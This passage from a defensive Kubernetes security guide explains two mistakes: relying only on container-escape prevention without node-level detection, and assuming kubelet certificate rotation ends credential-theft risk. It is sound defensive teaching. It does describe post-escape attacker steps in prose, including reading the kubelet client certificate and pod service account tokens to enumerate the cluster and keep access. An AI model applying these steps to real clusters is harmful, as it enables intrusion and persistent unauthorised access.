Treating the initial container escape as the only security boundary. The container boundary is one of multiple security boundaries in a Kubernetes cluster. When defenders focus exclusively on preventing container escapes — via seccomp profiles, AppArmor, read-only root filesystems, and dropped capabilities — while leaving the post-escape chain undefended, a single exploit bypasses all controls. The Falco rules and audit log configuration described here provide detection at each phase of the post-escape chain, independent of the escape mechanism. A container escape that triggers no Falco alerts and generates no anomalous audit log entries can remain undetected for weeks. The detection controls at the node level are not redundant with the prevention controls at the container level — they address the failure mode where prevention fails.

Assuming kubelet certificate rotation eliminates the credential theft risk. Certificate rotation reduces the window of credential usability, but does not eliminate it. The attacker who reads kubelet-client-current.pem at 9:00 AM has until the next rotation (which may be 23 hours away) to use that credential. During that window, they can enumerate the cluster, read secrets, and create persistent backdoors using other credentials found on the node — service account tokens from pod volumes, which have their own expiry and are not affected by kubelet certificate rotation. The 24-hour certificate window is meaningful for reducing the reusability of the kubelet cert specifically, but persistent access obtained using cluster-admin service account tokens is not affected.